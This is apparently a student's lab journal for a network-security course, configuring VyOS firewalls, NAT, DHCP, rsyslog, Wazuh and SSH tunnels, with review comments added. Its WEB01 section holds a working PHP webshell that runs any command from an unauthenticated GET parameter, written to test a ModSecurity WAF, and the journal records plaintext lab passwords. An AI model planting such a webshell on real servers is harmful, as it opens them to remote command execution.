- Don't forget to look at `/var/log/messages` to debug firewall issues.
- Do not try to use the default gateway address 10.0.17.2 as your WAN interface IP address as this will cause problems for other students and might be embarrassing.
## Nginx Web Server
Practice this on jump (it is an ubuntu box).
## Ubuntu DHCP Server
You can also practice this on jump, just move it to LAN, change the IP to something else and see if you can get wks01 to use dhcp services for IP, Netmask, Gateway and DNS settings. Make sure to reset wks01 to static.
## Traveler is a Windows System
You should research how to create a keypair using PowerShell or PuTTY and make sure you can adjust jump's authorized_keys file to use your new Windows public key.
## Deliverable 3
Practice this on either mgmt02 or wks01. Figure out how to create a keypair using either PowerShell or PuTTY, transfer the public portion to one of your Linux systems and demonstrate a passwordless login from Windows to a Linux system.
## Clearing the firewall configuration
You should rehearse vyos commands by clearing your current configuration. The following commands will do that. Note, this configuration will likely have the vyos/vyos password combination because that is what it ships with.
```
configure
load /opt/vyatta/etc/config.boot.default
commit
save
# to save and load a backup config file
save backup_1
load /config/backup_1
```

# Lab 9.1 - Ad Hoc VPN with SSH
SSH allows you to create a port forwarding tunnel (a "Local" forward in PuTTY's terms) such that connections to a local port on traveler will traverse an SSH tunnel from traveler to jump and then be forwarded to a system of your choice, say mgmt02.
- Enable RDP on mgmt02
- Create a named local administrator account (charlotte) if not done so already
- Create the DMZ-to-LAN and LAN-to-MGMT rules necessary for RDP to connect to mgmt02
```
# on edge01
set firewall name DMZ-to-LAN rule 40 action 'accept'
set firewall name DMZ-to-LAN rule 40 description 'jump to RDP'
set firewall name DMZ-to-LAN rule 40 destination address '172.16.200.11'
set firewall name DMZ-to-LAN rule 40 destination port '3389'
set firewall name DMZ-to-LAN rule 40 protocol 'tcp'
# on fw-mgmt
set firewall name LAN-to-MGMT rule 40 action 'accept'
set firewall name LAN-to-MGMT rule 40 description 'jump to RDP'
set firewall name LAN-to-MGMT rule 40 destination address '172.16.200.11'
set firewall name LAN-to-MGMT rule 40 destination port '3389'
set firewall name LAN-to-MGMT rule 40 protocol 'tcp'
```
source: https://www.cloudthat.com/resources/blog/a-guide-to-access-rdp-through-ssh-tunneling-using-putty
## Invoke an SSH connection from traveler to jump such that RDP connections in that tunnel are redirected to mgmt02.
### Step 1: Configure PuTTY for SSH Tunneling
- Launch PuTTY on your source Windows machine
- In the "Session" category:
- Enter the IP of the jump box (actually the firewall's WAN interface, 10.0.17.151, which port forwards 22 to jump)
- Keep port 22 / SSH
- Optionally save your session configuration
### Step 2: Set Up the SSH Tunnel for RDP
- In the PuTTY Configuration window, navigate to Connection > SSH > Tunnels
- Configure the tunnel with:
- Source port: 3390 (or any unused local port)
- Destination: 172.16.200.11:3389 (mgmt02)
- Select "Local" and "Auto" options
- Click "Add" to create the tunnel
### Step 3: Connect to the Jump Box
- Return to the "Session" category
- save your configuration
- Click "Open" to connect to the Linux jump box and enter the jump box credentials
### Step 4: Connect via RDP Through the Tunnel
- With the SSH connection active, open Remote Desktop Connection on your source Windows machine
- In the "Computer" field, enter: localhost:3390
- Click "Connect" and enter credentials for the destination Windows machine

# DHCP01 Configuration
## Basic Setup
- Set hostname to `dhcp01-charlotte`
- Add sudo user `charlotte`
Set network via netplan:
- IP Address: `172.16.150.151/24`
- Gateway & DNS: `172.16.150.2`
- Network adapter: LAN
## Install and Configure DHCP Server
Install DHCP server
```bash
sudo apt update
sudo apt install isc-dhcp-server -y
```
Configure DHCP server
```bash
> sudo nano /etc/dhcp/dhcpd.conf
default-lease-time 600;
max-lease-time 7200;
option subnet-mask 255.255.255.0;
option broadcast-address 172.16.150.255;
option routers 172.16.150.2;
option domain-name-servers 172.16.150.2;
subnet 172.16.150.0 netmask 255.255.255.0 {
  range 172.16.150.100 172.16.150.150;
}
```
Configure the interface for DHCP server:
```bash
> sudo nano /etc/default/isc-dhcp-server
...
INTERFACESv4="ens160"
INTERFACESv6=""
...
```
Start and enable DHCP server
```bash
sudo systemctl enable isc-dhcp-server
sudo systemctl restart isc-dhcp-server
```
## Install Wazuh Agent
```bash
# Download and install Wazuh agent
curl -o wazuh-agent-4.7.5-1.amd64.deb https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent-4.7.5-1.amd64.deb && sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='dhcp01-charlotte' dpkg -i wazuh-agent-4.7.5-1.amd64.deb
# Start the agent
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```

# EDGE01 Configuration
## Initial Setup
- Change password:
```
configure
set system login user vyos authentication plaintext-password password123!
commit
save
```
- Change hostname:
```
configure
set system host-name edge01-charlotte
commit
save
```
## Interface Configuration
```
configure
set interfaces ethernet eth0 description SEC350-WAN
set interfaces ethernet eth1 description CHARLOTTE-DMZ
set interfaces ethernet eth2 description CHARLOTTE-LAN
set interfaces ethernet eth0 address 10.0.17.151/24
set interfaces ethernet eth1 address 172.16.50.2/29
set interfaces ethernet eth2 address 172.16.150.2/24
commit
save
```
## Gateway and DNS Configuration
```
configure
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set system name-server 10.0.17.2
commit
save
```
## NAT Configuration
```
configure
# DMZ to WAN NAT
set nat source rule 10 description "NAT FROM DMZ to WAN"
set nat source rule 10 outbound-interface eth0
set nat source rule 10 source address 172.16.50.0/29
set nat source rule 10 translation address masquerade
# LAN to WAN NAT
set nat source rule 20 description "NAT FROM LAN to WAN"
set nat source rule 20 outbound-interface eth0
set nat source rule 20 source address 172.16.150.0/24
set nat source rule 20 translation address masquerade
# MGMT to WAN NAT
set nat source rule 30 description "NAT FROM MGMT to WAN"
set nat source rule 30 outbound-interface eth0
set nat source rule 30 source address 172.16.200.0/28
set nat source rule 30 translation address masquerade
# Port Forwarding for HTTP
set nat destination rule 10 description "HTTP->NGINX01"
set nat destination rule 10 inbound-interface eth0
set nat destination rule 10 destination port 80
set nat destination rule 10 protocol tcp
set nat destination rule 10 translation address 172.16.50.3
# Port Forwarding for SSH
set nat destination rule 20 description "SSH->JUMP"
set nat destination rule 20 inbound-interface eth0
set nat destination rule 20 destination port 22
set nat destination rule 20 protocol tcp
set nat destination rule 20 translation address 172.16.50.4
commit
save
```
## DNS Forwarding Configuration
```
configure
# DMZ DNS Forwarding
set service dns forwarding listen-address 172.16.50.2
set service dns forwarding allow-from 172.16.50.0/29
# LAN DNS Forwarding
set service dns forwarding listen-address 172.16.150.2
set service dns forwarding allow-from 172.16.150.0/24
set service dns forwarding system
commit
save
```
## Zone Configuration
```
configure
set zone-policy zone WAN interface eth0
set zone-policy zone DMZ interface eth1
set zone-policy zone LAN interface eth2
commit
save
```
## Firewall Configuration
```
configure
# Create Zone-Based Firewalls
# WAN-to-DMZ
set firewall name WAN-to-DMZ default-action drop
set firewall name WAN-to-DMZ enable-default-log
set firewall name WAN-to-DMZ rule 1 action accept
set firewall name WAN-to-DMZ rule 1 state established enable
set firewall name WAN-to-DMZ rule 10 description "allow HTTP from WAN to DMZ"
set firewall name WAN-to-DMZ rule 10 action accept
set firewall name WAN-to-DMZ rule 10 destination address 172.16.50.3
set firewall name WAN-to-DMZ rule 10 destination port 80
set firewall name WAN-to-DMZ rule 10 protocol tcp
set firewall name WAN-to-DMZ rule 20 action accept
set firewall name WAN-to-DMZ rule 20 description "SSH to JUMP"
set firewall name WAN-to-DMZ rule 20 destination address 172.16.50.4
set firewall name WAN-to-DMZ rule 20 destination port 22
set firewall name WAN-to-DMZ rule 20 protocol tcp
# DMZ-to-WAN
set firewall name DMZ-to-WAN default-action drop
set firewall name DMZ-to-WAN enable-default-log
set firewall name DMZ-to-WAN rule 1 action accept
set firewall name DMZ-to-WAN rule 1 state established enable
# LAN-to-DMZ
set firewall name LAN-to-DMZ default-action drop
set firewall name LAN-to-DMZ enable-default-log
set firewall name LAN-to-DMZ rule 1 action accept
set firewall name LAN-to-DMZ rule 1 state established enable
set firewall name LAN-to-DMZ rule 10 description "Allow HTTP from LAN to DMZ"
set firewall name LAN-to-DMZ rule 10 action accept
set firewall name LAN-to-DMZ rule 10 destination address 172.16.50.3
set firewall name LAN-to-DMZ rule 10 destination port 80
set firewall name LAN-to-DMZ rule 10 protocol tcp
set firewall name LAN-to-DMZ rule 20 description "Allow SSH from MGMT-01 to DMZ"
set firewall name LAN-to-DMZ rule 20 action accept
set firewall name LAN-to-DMZ rule 20 destination port 22
set firewall name LAN-to-DMZ rule 20 protocol tcp
set firewall name LAN-to-DMZ rule 20 source address 172.16.150.10
# DMZ-to-LAN
set firewall name DMZ-to-LAN default-action drop
set firewall name DMZ-to-LAN enable-default-log
set firewall name DMZ-to-LAN rule 1 action accept
set firewall name DMZ-to-LAN rule 1 state established enable
set firewall name DMZ-to-LAN rule 10 description "wazuh agent communication with server"
set firewall name DMZ-to-LAN rule 10 action accept
set firewall name DMZ-to-LAN rule 10 destination address 172.16.200.10
set firewall name DMZ-to-LAN rule 10 destination port 1514,1515
set firewall name DMZ-to-LAN rule 10 protocol tcp
# LAN-to-WAN
set firewall name LAN-to-WAN default-action drop
set firewall name LAN-to-WAN enable-default-log
set firewall name LAN-to-WAN rule 1 action accept
# WAN-to-LAN
set firewall name WAN-to-LAN default-action drop
set firewall name WAN-to-LAN enable-default-log
set firewall name WAN-to-LAN rule 1 action accept
set firewall name WAN-to-LAN rule 1 state established enable
# Apply Zone Policies
set zone-policy zone DMZ from LAN firewall name LAN-to-DMZ
set zone-policy zone DMZ from WAN firewall name WAN-to-DMZ
set zone-policy zone LAN from DMZ firewall name DMZ-to-LAN
set zone-policy zone LAN from WAN firewall name WAN-to-LAN
set zone-policy zone WAN from DMZ firewall name DMZ-to-WAN
set zone-policy zone WAN from LAN firewall name LAN-to-WAN
commit
save
```
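To sanity-check these rule sets before committing them, here is a small Python model of edge01's zone policies, added as an example (it is not VyOS code or part of the lab). It assigns each address to the zone of the interface edge01 would forward it out of (MGMT hosts count as LAN because they sit behind fw-mgmt, as the MGMT-to-LAN note earlier explains), walks each policy's rules in order, and shows why the `state established` rule is what lets replies back.

```python
import ipaddress

# Constructed model of the edge01 zone policies above (example only, not VyOS code).
# An address is assigned to the zone of the interface edge01 would forward it out of,
# so MGMT hosts count as LAN here (they sit behind fw-mgmt) and anything without a
# more specific route follows the default route out eth0, the WAN zone.
ZONE_ROUTES = [
    (ipaddress.ip_network("172.16.50.0/29"), "DMZ"),
    (ipaddress.ip_network("172.16.150.0/24"), "LAN"),
    (ipaddress.ip_network("172.16.200.0/28"), "LAN"),   # MGMT, learned via RIP from fw-mgmt
]


def zone_of(ip):
    addr = ipaddress.ip_address(ip)
    for net, zone in ZONE_ROUTES:
        if addr in net:
            return zone
    return "WAN"


def rule(action, src=None, dst=None, dport=None, proto=None, established=False):
    """One 'set firewall name X rule N ...' entry; dport may be an int or a tuple."""
    return {"action": action, "src": src, "dst": dst, "dport": dport,
            "proto": proto, "established": established}


# (from zone, to zone) -> (rules in order, default-action), mirroring the config above
POLICIES = {
    ("WAN", "DMZ"): ([rule("accept", established=True),
                      rule("accept", dst="172.16.50.3", dport=80, proto="tcp"),
                      rule("accept", dst="172.16.50.4", dport=22, proto="tcp")], "drop"),
    ("DMZ", "WAN"): ([rule("accept", established=True)], "drop"),
    ("LAN", "DMZ"): ([rule("accept", established=True),
                      rule("accept", dst="172.16.50.3", dport=80, proto="tcp"),
                      rule("accept", src="172.16.150.10", dport=22, proto="tcp")], "drop"),
    ("DMZ", "LAN"): ([rule("accept", established=True),
                      rule("accept", dst="172.16.200.10", dport=(1514, 1515), proto="tcp")], "drop"),
    ("LAN", "WAN"): ([rule("accept")], "drop"),
    ("WAN", "LAN"): ([rule("accept", established=True)], "drop"),
}


def matches(r, flow, established):
    if r["established"]:
        return established
    if r["src"] and r["src"] != flow["src"]:
        return False
    if r["dst"] and r["dst"] != flow["dst"]:
        return False
    if r["proto"] and r["proto"] != flow["proto"]:
        return False
    if r["dport"] is not None:
        ports = r["dport"] if isinstance(r["dport"], tuple) else (r["dport"],)
        if flow["dport"] not in ports:
            return False
    return True


def evaluate(src, dst, dport, proto="tcp", established=False):
    """Verdict for one packet through edge01. Destination NAT has already run, so a
    WAN client that hit 10.0.17.151:80 is seen here with dst 172.16.50.3."""
    pair = (zone_of(src), zone_of(dst))
    if pair[0] == pair[1]:
        return "accept"          # same zone: no zone policy applies
    rules, default = POLICIES[pair]
    flow = {"src": src, "dst": dst, "dport": dport, "proto": proto}
    for r in rules:
        if matches(r, flow, established):
            return r["action"]
    return default


def session_allowed(src, dst, dport, proto="tcp"):
    """A TCP session needs the first packet accepted one way and the reply accepted
    the other way; the reply only gets through on a 'state established' rule."""
    if evaluate(src, dst, dport, proto) != "accept":
        return False
    return evaluate(dst, src, dport, proto, established=True) == "accept"


if __name__ == "__main__":
    checks = [
        ("traveler -> nginx01 http", "10.0.17.51", "172.16.50.3", 80),
        ("traveler -> nginx01 ssh", "10.0.17.51", "172.16.50.3", 22),
        ("mgmt01 -> nginx01 ssh", "172.16.150.10", "172.16.50.3", 22),
        ("wks01 -> nginx01 ssh", "172.16.150.50", "172.16.50.3", 22),
        ("nginx01 -> internet (updates)", "172.16.50.3", "8.8.8.8", 443),
        ("jump -> wazuh agent port", "172.16.50.4", "172.16.200.10", 1514),
    ]
    for label, s, d, p in checks:
        print(f"{label:32s} {'ok' if session_allowed(s, d, p) else 'blocked'}")
```

The "nginx01 -> internet" check coming back blocked is the same situation the Lab 5.1 warning describes, which is why that lab added a temporary DMZ-to-WAN rule for updates.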
## RIP Configuration
```
configure
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
commit
save
```
## SSH Configuration
```
# Restrict SSH access to LAN interface only
configure
set service ssh listen-address 172.16.150.2
commit
save
```

# FW-MGMT Configuration
## Interface Configuration
```
configure
set interfaces ethernet eth0 description LAN
set interfaces ethernet eth1 description MGMT
set interfaces ethernet eth0 address 172.16.150.3/24
set interfaces ethernet eth1 address 172.16.200.2/28
commit
save
```
## Gateway & DNS Configuration
```
configure
set protocols static route 0.0.0.0/0 next-hop 172.16.150.2
set system name-server 172.16.150.2
commit
save
```
## DNS Forwarding
```
configure
set service dns forwarding listen-address 172.16.200.2
set service dns forwarding allow-from 172.16.200.0/28
set service dns forwarding system
commit
save
```
## Zone Configuration
```
configure
set zone-policy zone LAN interface eth0
set zone-policy zone MGMT interface eth1
commit
save
```
## Firewall Configuration
copy current configuration from `configs` directory
## RIP Configuration
```
configure
set protocols rip interface eth0
set protocols rip network '172.16.200.0/28'
commit
save
```

# FW01 Configuration
## Initial Setup
- Change password:
```
configure
set system login user vyos authentication plaintext-password password
commit
save
```
## Hostname Configuration
```
configure
set system host-name fw01-charlotte
commit
save
```
## Interface Configuration
```
configure
set interfaces ethernet eth0 description SEC350-WAN
set interfaces ethernet eth1 description CHARLOTTE-DMZ
set interfaces ethernet eth2 description CHARLOTTE-LAN
set interfaces ethernet eth0 address 10.0.17.151/24
set interfaces ethernet eth1 address 172.16.50.2/29
set interfaces ethernet eth2 address 172.16.150.2/24
commit
save
```
## Gateway & DNS Configuration
```
configure
set protocols static route 0.0.0.0/0 next-hop 10.0.17.2
set system name-server 10.0.17.2
commit
save
```
## NAT Configuration
```
configure
# DMZ to WAN NAT
set nat source rule 10 description "NAT FROM DMZ to WAN"
set nat source rule 10 outbound-interface eth0
set nat source rule 10 source address 172.16.50.0/29
set nat source rule 10 translation address masquerade
# LAN to WAN NAT
set nat source rule 20 description "NAT FROM LAN to WAN"
set nat source rule 20 outbound-interface eth0
set nat source rule 20 source address 172.16.150.0/24
set nat source rule 20 translation address masquerade
# MGMT to WAN NAT
set nat source rule 30 description "NAT FROM MGMT to WAN"
set nat source rule 30 outbound-interface eth0
set nat source rule 30 source address 172.16.200.0/28
set nat source rule 30 translation address masquerade
commit
save
```
## DNS Forwarding Configuration
```
configure
# DMZ DNS Forwarding
set service dns forwarding listen-address 172.16.50.2
set service dns forwarding allow-from 172.16.50.0/29
# LAN DNS Forwarding
set service dns forwarding listen-address 172.16.150.2
set service dns forwarding allow-from 172.16.150.0/24
set service dns forwarding system
commit
save
```
## Zone Configuration
```
configure
set zone-policy zone WAN interface eth0
set zone-policy zone DMZ interface eth1
set zone-policy zone LAN interface eth2
commit
save
```
## Firewall Configuration
copy current configuration from `configs` directory
## RIP Configuration
```
configure
set protocols rip interface eth2
set protocols rip network '172.16.50.0/29'
commit
save
```
## Syslog Configuration (remove when appropriate)
```
# When log01 is active
set system syslog host 172.16.50.5 facility authpriv level info
# When log01 is retired
delete system syslog host 172.16.50.5
```

# LOG01 Configuration
> **Note**: This is the original log01 server that will eventually be retired, then brought back as a jump server.
## Basic Setup
- Set hostname to `log01-charlotte`
- Add sudo user `charlotte:password`
- Set network adapter to DMZ
- Configure static IP via nmtui:
- IP Address: `172.16.50.5/29`
- Gateway & DNS: `172.16.50.2`
## Configure Firewall for Syslog
```
sudo firewall-cmd --add-port=514/tcp --permanent
sudo firewall-cmd --add-port=514/udp --permanent
sudo firewall-cmd --reload
```
## Configure Rsyslog
### Enable Syslog Input Modules
Edit `/etc/rsyslog.conf` and uncomment these lines:
```
# Provides UDP syslog reception
module(load="imudp")
input(type="imudp" port="514")
# Provides TCP syslog reception
module(load="imtcp")
input(type="imtcp" port="514")
```
### Configure High Precision Timestamps
Add to `/etc/rsyslog.conf`:
```
$ActionFileDefaultTemplate RSYSLOG_SyslogProtocol23Format
template(name="BetterTiming" type="string" string="%timestamp:::date-rfc3339% %HOSTNAME% %syslogtag%%msg%\n")
```
Apply the template to the desired log file:
```
# Example: Add ;BetterTiming suffix to a log destination
*.info;mail.none;authpriv.none;cron.none /var/log/messages;BetterTiming
```
### Configure Log Organization
Create a file named `/etc/rsyslog.d/sec350.conf` with these contents (if you already uncommented the imudp/imtcp lines in `/etc/rsyslog.conf`, leave the module loads out here: loading the same module twice is a configuration error in rsyslog):
```
# Input modules
module(load="imudp")
input(type="imudp" port="514")
module(load="imtcp")
input(type="imtcp" port="514")
# Creating templates for storing logs dynamically
$template DynFile,"/var/log/%HOSTNAME%/%$YEAR%/%$MONTH%/%$DAY%/%programname%.log"
$template RemoteLogs,"/var/log/remote/%HOSTNAME%/%$YEAR%/%$MONTH%/%$DAY%/%programname%.log"
# Create a ruleset for remote devices
ruleset(name="RemoteDevice"){
    action(type="omfile" dynaFile="RemoteLogs")
}
# Direct local logs to files
:programname, !startswith, "rsyslog" ?DynFile
# Direct messages from remote hosts to the ruleset
:inputname, isequal, "imudp" call RemoteDevice
:inputname, isequal, "imtcp" call RemoteDevice
```
### Restart Rsyslog
```
sudo systemctl restart rsyslog
```
## Monitor Incoming Logs
```
tail -f /var/log/messages
```
Or check specific remote log files:
```
tail -f /var/log/remote/*/*/*/*/sshd.log
```
## Recommissioned as Jump Server
When log01 is repurposed as a jump server:
1. Change IP address to: `172.16.50.4/29`
2. Change hostname: `sudo hostnamectl set-hostname jump-charlotte`
### SSH Configuration for Passwordless Access
```bash
# Create dedicated user for jump access
sudo useradd -m -d /home/charlotte-jump -s /bin/bash charlotte-jump
# Disable password authentication (match the directive whether or not it is still commented out)
sudo sed -i 's/^#\?PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config
# Create SSH directory structure with proper permissions
sudo mkdir -p /home/charlotte-jump/.ssh
sudo chmod 700 /home/charlotte-jump/.ssh
# Add the public key to authorized_keys (tee -a, because a plain >> redirect would not run as root)
echo "ssh-rsa AAAAB3N...your-public-key..." | sudo tee -a /home/charlotte-jump/.ssh/authorized_keys
# Set proper permissions and ownership
sudo chmod 600 /home/charlotte-jump/.ssh/authorized_keys
sudo chown -R charlotte-jump:charlotte-jump /home/charlotte-jump/.ssh
# Validate the config before restarting so a typo does not lock you out
sudo sshd -t && sudo systemctl restart sshd
```
### Wazuh Agent Installation
```bash
sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='jump-charlotte' rpm -ihv wazuh-agent-4.7.3-1.x86_64.rpm
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```

# MGMT01 Configuration
## Network Configuration
- Configure static IP via network manager:
- IP Address: `172.16.150.10/24`
- Gateway & DNS: `172.16.150.2`
- Network: LAN
## Chrome Remote Desktop Setup
1. Open Chrome and sign in with charlotte.croce@mymail.champlain.edu
2. Enable sync if prompted
3. Go to remotedesktop.google.com and install the app
4. On your main host (laptop):
- Go to https://g.co/crd/headless
- Download and install the Chrome Remote Desktop package
- For dependency issues:
```
sudo apt install libutempter0 xbase-clients xserver-xorg-video-dummy xvfb
sudo dpkg -i google-chrome-stable_current_amd64
```
5. Follow the setup prompts and create a PIN
6. Log out of the remote computer before attempting to connect
## Notes
- With current firewall configs, this machine should be able to access:
- SSH to systems in the DMZ (port 22)
- HTTPS access to wazuh server (port 443)

# MGMT02 Configuration
## Network Configuration
- Configure static IP:
- IP Address: `172.16.200.11/28`
- Gateway & DNS: `172.16.200.2`
- Network: MGMT

# NGINX01 Configuration
## Basic Setup
- Set hostname to `nginx01-charlotte`
- Add sudo user `charlotte`
- Set network via nmtui:
- IP Address: `172.16.50.3/29`
- Gateway & DNS: `172.16.50.2`
- Network adapter: DMZ
## Install and Configure NGINX
```bash
# Install NGINX
sudo apt update
sudo apt install nginx -y
sudo systemctl enable nginx
sudo systemctl start nginx
# Create custom index page
echo "<h1>NGINX01 - Charlotte Croce</h1>" | sudo tee /var/www/html/index.html
```
- Remember to add firewall and port forwarding rules for this new IP!
- Also, add firewall-cmd rules if applicable
## Install Wazuh Agent
```bash
# Download and install Wazuh agent
curl -o wazuh-agent-4.7.5-1.amd64.deb https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent-4.7.5-1.amd64.deb && sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='nginx01-charlotte' dpkg -i wazuh-agent-4.7.5-1.amd64.deb
# Start the agent
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```

# RW01 Configuration
## Basic Setup
- Set hostname to `rw01-charlotte`
- Add sudo user `charlotte:password`
- IP Address: `10.0.17.51/24`
- Gateway & DNS: `10.0.17.2`
## Static Route for DMZ Access
```bash
sudo ip route add 172.16.50.0/29 via 10.0.17.151
sudo systemctl restart NetworkManager
traceroute 172.16.50.3
```
## Rsyslog Configuration for High Precision Timestamps
1. Edit `/etc/rsyslog.conf`
2. Comment out this line to enable high precision timestamps:
```
# $ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat
```
3. Restart rsyslog:
```bash
sudo systemctl restart rsyslog
```
## SSH Key Creation for Jump Server Access
Generate a dedicated SSH key for jump server access:
```bash
ssh-keygen -t rsa -b 4096 -C "ssh to jump"
# Use filename: jump-charlotte
# Add a passphrase
```
To connect to the jump server using this key:
```bash
ssh -i ~/.ssh/jump-charlotte charlotte-jump@172.16.50.4
```

# TRAVELER Configuration
Windows machine to replace RW01
## Network Configuration
- System is on WAN network
- IP address: `10.0.17.51/24`
- Default gateway: `10.0.17.2`
- DNS server: `10.0.17.2`
## SSH Key Creation for Jump Server Access
Generate SSH keys using PowerShell:
```powershell
# Generate new SSH key
ssh-keygen -t rsa -b 4096 -C "traveler to jump"
# Use filename: jump-charlotte
# Add a passphrase
```
To connect to the jump server:
```powershell
ssh -i C:\Users\username\.ssh\jump-charlotte charlotte-jump@10.0.17.151
```
## Web Access
Can access nginx01 via `http://10.0.17.151:80` (port forwarded through edge01)

# Wazuh Server Configuration
## Network Configuration
- Set hostname: `sudo hostnamectl hostname wazuh-charlotte`
- Configure static IP with netplan by editing `/etc/netplan/00-installer-config.yaml`:
```yaml
network:
  ethernets:
    ens160:
      addresses:
        - 172.16.200.10/28
      nameservers:
        addresses: [172.16.200.2]
      routes:
        - to: default
          via: 172.16.200.2
  version: 2
```
- Apply netplan configuration:
```
sudo netplan apply
```
## Wazuh Installation
> **IMPORTANT**: Take a snapshot before installation
Run the single-node installation command:
```
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh && sudo bash ./wazuh-install.sh -a -i
```
> Note: The `-i` flag ignores minimum requirements of 2 CPU and 4 GB RAM
**IMPORTANT**: Save the auto-generated password shown after installation, you will need it later.
## Accessing the Wazuh Dashboard
- Try accessing the dashboard at: http://172.16.200.10/app/login
- Login with the auto-generated credentials
## Wazuh Agent Management
1. Create a new agent group:
- Wazuh dropdown > Management > Groups > Create a new group called "linux"
2. Deploy a new agent:
- Wazuh dropdown > Agents > Deploy a new agent
- Configuration options:
- OS: Redhat/CentOS
- Version: CentOS 6 or higher (works on Rocky 8)
- Architecture: x86_64
- Server IP: 172.16.200.10
- Agent Group: Linux
3. The web interface will generate an installation command for your agents
## Firewall Requirements
Ensure these ports are open:
- **1514/TCP** for agent communication
- **1515/TCP** for enrollment via automatic agent request
- **55000/TCP** for enrollment via Wazuh server API
## Agent Directory Structure
Wazuh agent files are stored in `/var/ossec/`. Key directories include:
- `/var/ossec/etc/` - Configuration files
- `/var/ossec/etc/ossec.conf` - agent IP settings
- `/var/ossec/logs/` - Log files
- `/var/ossec/queue/` - Communication queue
- `/var/ossec/agentless/` - Agentless monitoring
## Viewing Security Events
Dropdown > Modules > Security Events
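Review bot: the install step `curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh && sudo bash ./wazuh-install.sh -a -i` runs a freshly downloaded script as root with no integrity check; split it into the download, an inspection or checksum verification of `wazuh-install.sh`, and only then the `sudo bash` step, so a tampered download is caught before it has root. Two smaller points: the Firewall Requirements list stops at 1514, 1515 and 55000, yet the dashboard is reached at `http://172.16.200.10/app/login`, so the dashboard's web port (reachable from the MGMT network only) belongs in that list too; and "Save the auto-generated password" should say where, because the obvious place for a student is this journal, which is the wrong place for it.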


@ -0,0 +1,104 @@
# WEB01 Configuration
## Basic Setup
- Set hostname to `web01-charlotte`
- Add sudo user `charlotte:password`
- Set network via nmtui:
- IP Address: `172.16.50.3/29`
- Gateway & DNS: `172.16.50.2`
- Network adapter: DMZ
## Install and Configure HTTPD
```
# Install apache web server
sudo yum install httpd
sudo systemctl enable httpd
sudo systemctl start httpd
# If you need to edit the main config file:
sudo vi /etc/httpd/conf/httpd.conf
```
## Rsyslog Configuration
### Install rsyslog (if not installed)
```
sudo yum install rsyslog
```
### Configure Rsyslog for High Precision Timestamps
Edit `/etc/rsyslog.conf` and add these lines:
```
$ActionFileDefaultTemplate RSYSLOG_SyslogProtocol23Format
template(name="BetterTiming" type="string" string="%timestamp:::date-rfc3339% %HOSTNAME% %syslogtag%%msg%\n")
```
Note: ModSecurity will prevent dangerous commands like cat /etc/passwd while allowing safe commands like whoami and /sbin/ifconfig.
Apply the template to the desired log file:
```
# Example: Add ;BetterTiming suffix to a log destination
*.info;mail.none;authpriv.none;cron.none /var/log/messages;BetterTiming
```
### Configure Log Forwarding (when log01 is active)
Create a file at `/etc/rsyslog.d/sec350.conf` with these contents:
```
# For general logging
user.notice @172.16.50.5
# For authentication logging
authpriv.* @172.16.50.5
```
Restart rsyslog:
```
sudo systemctl restart rsyslog
```
## Install Wazuh Agent
```
# Download and install Wazuh agent
curl -o wazuh-agent-4.7.5-1.x86_64.rpm https://packages.wazuh.com/4.x/yum/wazuh-agent-4.7.5-1.x86_64.rpm && sudo WAZUH_MANAGER='172.16.200.10' WAZUH_AGENT_GROUP='linux' WAZUH_AGENT_NAME='web01-charlotte' rpm -ihv wazuh-agent-4.7.5-1.x86_64.rpm
# Start the agent
sudo systemctl daemon-reload
sudo systemctl enable wazuh-agent
sudo systemctl start wazuh-agent
```
## CentOS Repo Fix (if needed)
```
sudo sed -i s/mirror.centos.org/vault.centos.org/g /etc/yum.repos.d/CentOS-*.repo
sudo sed -i s/^#.*baseurl=http/baseurl=http/g /etc/yum.repos.d/CentOS-*.repo
sudo sed -i s/^mirrorlist=http/#mirrorlist=http/g /etc/yum.repos.d/CentOS-*.repo
```
## Web Application Firewall (ModSecurity)
Install ModSecurity and PHP:
```bash
sudo yum install mod_security mod_security_crs php php-common php-opcache php-cli php-gd php-curl php-mysqlnd -y
```
## Create Test PHP Webshell
Create `/var/www/html/shell.php` with the following content:
```
<!-- source: https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985 -->
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
```
> [!Note]
> ModSecurity will prevent dangerous commands like `cat /etc/passwd` while allowing safe commands like `whoami` and `/sbin/ifconfig`.
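Review bot: the sentence "Note: ModSecurity will prevent dangerous commands like cat /etc/passwd ..." sits in the middle of the Rsyslog timestamp section, between the template block and "Apply the template to the desired log file", and is a stray duplicate of the callout that already closes the page under Create Test PHP Webshell; delete the copy in the Rsyslog section. Three further points. `Add sudo user charlotte:password` records a literal credential in a committed journal; use a placeholder such as `<password>`. The webshell at `/var/www/html/shell.php` executes whatever arrives in the `cmd` parameter of an unauthenticated GET on a DMZ host, so the section needs a final step that removes the file once the WAF test is done, and the closing note should not be read as a guarantee: the CRS blocks the patterns it knows, not "dangerous commands" in general. Finally, `user.notice @172.16.50.5` and `authpriv.* @172.16.50.5` forward over UDP (single `@`); the rsyslog page in this same commit points out that `@@` means TCP, which is the better choice for authentication logs that should not be silently dropped.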


@ -0,0 +1,10 @@
# WKS01 Configuration
## Network Configuration
- Configure static IP via network manager:
- IP Address: `172.16.150.50/24`
- Gateway & DNS: `172.16.150.2`
- Network: LAN
## Notes
- This workstation has HTTP access to web01 in the DMZ through firewall rules
